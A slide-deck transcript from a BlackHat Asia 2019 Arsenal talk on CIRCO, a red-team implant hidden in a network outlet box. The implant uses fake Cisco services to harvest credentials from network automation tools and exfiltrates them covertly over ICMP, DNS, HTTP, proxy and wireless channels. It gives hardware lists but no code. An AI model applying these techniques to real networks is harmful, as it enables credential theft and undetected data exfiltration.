CIRCO - BlackHat Asia 2019 Arsenal

Transcript

1. None

2. CIRCO Cisco Implant Raspberry Controlled Operations https://circo.cc

3. What is CIRCO? Designed under Raspberry Pi and aimed for

   Red Team Ops, we take advantage of “Sec/Net/Dev/Ops” enterprise tools to capture network credentials in a stealth mode. Using a low profile hardware & electronics camouflaged as simple network outlet box to be sitting under/over a desk. CIRCO include different techniques for network data exfiltration to avoid detection. This tool gather information and use a combination of honeypots to trick Automation Systems to give us their network credentials! https://circo.cc

4. Who we target? • Cisco DNA (Digital Network Architecture) •

   Infoblox NetMRI • Micro Focus® Network Automation (formerly HPNA NA/Opsware) • Service Now Discovery* • ForeScout CounterACT (NAC) • Others * SNMP discovery only https://circo.cc

5. CIRCO Demo Box • Raspberry Pi Zero W with SD

   Card • USB LAN Adapter • USB Hub • Wireless Dongle (WLI-UC-GNM2S) • PoE LAN Adapter (12V) • Bucket Regulator (12V-5V) https://circo.cc

6. CIRCO Production Box (#1) • Raspberry Pi 3B with SD

   Card • PoE LAN Adapter (5V) • Quad RJ45 Wall Faceplate • Desk/Mount Box Network Outlet https://circo.cc

7. CIRCO Production Box (#2) https://circo.cc • 1 RJ45 Socket •

   Desk/Mount Flat Network Outlet • Raspberry Pi Zero W with SD Card • PoE LAN Adapter (5V) • USB LAN Adapter

8. Hardware Cost • LAN PoE Adapter (5v) = $6 (eBay)

   • USB LAN Adapter = $9 (Amazon) • USB Wireless Adapter = $10 (Amazon) • Raspberry Pi Zero = $6 (Pimoroni) • Flat Network Outlet = $9 (eBay) Get CIRCO for $40 bucks! https://circo.cc

9. Fake Services (Honeypots) • Cisco CDP & LLDP Advertisement (as

   IP-Phone & Network Switch) • Cisco SNMP Agent • Cisco Telnet CLI (IOS 15.x) • Cisco SSH CLI (IOS 15.x) https://circo.cc

10. Demo Network Diagram https://circo.cc

11. Logic Flow https://circo.cc

12. Network Exfiltration Techniques Credentials & IP address are encrypted with

    AES before sending • ICMP (IP.id & ICMP.seq fields) • Traceroute (IP.id field & UDP payload) • DNS (NS query evil.sub.domain) • HTTP (IP.id & TCP.window fields) • HTTPS (IP.id & TCP.window fields) • DNS (A query) via Proxy (DHCP Option 252, WPAD.<domain>, PAC Guessing via DNS) • Wireless* (SSID Name & Dot11.beacon, Dot11.SC and Dot11.interval) * Proximity required https://circo.cc

13. ICMP Exfiltration Flow https://circo.cc

14. Traceroute Exfiltration Flow https://circo.cc

15. DNS Exfiltration Flow https://circo.cc

16. HTTP/HTTPS Exfiltration Flow https://circo.cc

17. Proxy (DHCP) Exfiltration Flow https://circo.cc

18. Proxy (WPAD) Exfiltration Flow https://circo.cc

19. Proxy (DNS Guessing) Exfiltration Flow https://circo.cc

20. Wireless Exfiltration Flow https://circo.cc

21. Appendix https://circo.cc

22. IP Packet Fields 0 16 32 bits Version 8 IHL

    4 DSCP ECN 14 18 Flags Total Length Fragment Offset Time to Live Protocol Identification Header Checksum Source Address Destination Address Options https://circo.cc

23. ICMP Packet Fields 0 16 32 bits Type Code Checksum

    Identifier Optional Data Sequence Number 8 https://circo.cc

24. UDP Packet Fields 0 16 32 bits Destination Port Length

    Checksum Optional Data Source Port https://circo.cc

25. TCP Packet Fields 0 16 32 bits 7 4 18

    Destination Port Data offset Sequence Number Control Flags Checksum Optional Data Source Port Acknowledgement Number Reserved Windows Size Urgent Pointer https://circo.cc

26. DNS Packet Fields 0 16 Query ID QR Answer Count

    Authority RR Count Question Count Additional RR Count DNS Question or Answer Data Opcode AA TC RD RA Z Rcode https://circo.cc

27. Thanks For Listening! Any questions @ekio_jp